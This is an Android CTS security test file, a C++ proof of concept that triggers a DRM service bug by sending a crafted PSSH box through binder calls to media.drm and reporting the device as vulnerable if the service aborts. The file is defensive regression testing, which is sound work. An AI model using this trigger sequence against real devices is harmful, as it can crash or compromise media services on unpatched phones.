Google Git
Sign in
android / platform / cts / 0f4e6b8da7f42758fcde6d9d7986efe0053a5404 / . / hostsidetests / securitybulletin / securityPatch / Bug-137282168 / poc.cpp
blob: 0f27c1cf25e5e8b3324db8a981f1335696faeb83 [file] [log] [blame]
/**
* Copyright (C) 2019 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <binder/IBinder.h>
#include <binder/IServiceManager.h>
#include <binder/Parcel.h>
#include <utils/String16.h>
#include <utils/String8.h>
#include "../includes/common.h"
using namespace android;
static uint8_t pssh[28] = {
0, 0, 0, 28, // Total Size
'p', 's', 's', 'h', // PSSH
1, 0, 0, 0, // Version
0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02, // System ID
0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b,
};
static Vector<uint8_t> sessionId;
static sp<IBinder> drmBinder;
static void handler(int) {
ALOGI("Good, the test condition has been triggered");
exit(EXIT_VULNERABLE);
}
static void readVector(Parcel &reply, Vector<uint8_t> &vector) {
uint32_t size = reply.readInt32();
vector.insertAt((size_t)0, size);
reply.read(vector.editArray(), size);
}
static void writeVector(Parcel &data, Vector<uint8_t> const &vector) {
data.writeInt32(vector.size());
data.write(vector.array(), vector.size());
}
static void makeDrm() {
sp<IServiceManager> sm = defaultServiceManager();
sp<IBinder> mediaDrmBinder = sm->getService(String16("media.drm"));
Parcel data, reply;
data.writeInterfaceToken(String16("android.media.IMediaDrmService"));
mediaDrmBinder->transact(2 /* MAKE_DRM */, data, &reply, 0);
drmBinder = reply.readStrongBinder();
}
static void createPlugin() {
Parcel data, reply;
data.writeInterfaceToken(String16("android.drm.IDrm"));
uint8_t uuid[16] = {0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b};
data.write(uuid, 16);
data.writeString8(String8("ele7enxxh"));
drmBinder->transact(3 /* CREATE_PLUGIN */, data, &reply, 0);
}
static void openSession() {
Parcel data, reply;
data.writeInterfaceToken(String16("android.drm.IDrm"));
data.writeInt32(1 /* SW_SECURE_CRYPTO */); // level
drmBinder->transact(5 /* OPEN_SESSION */, data, &reply, 0);
readVector(reply, sessionId);
}
static void getKeyRequest() {
Parcel data, reply;
data.writeInterfaceToken(String16("android.drm.IDrm"));
Vector<uint8_t> initData;
initData.appendArray(pssh, sizeof(pssh));
writeVector(data, sessionId);
writeVector(data, initData);
data.writeString8(
String8("video/mp4") /* kIsoBmffVideoMimeType */); // mimeType
data.writeInt32(1 /* KeyType::STREAMING */); // keyType
data.writeInt32(0); // count
drmBinder->transact(7 /*GET_KEY_REQUEST*/, data, &reply);
}
int main(void) {
signal(SIGABRT, handler);
makeDrm();
createPlugin();
openSession();
getKeyRequest();
return 0;
}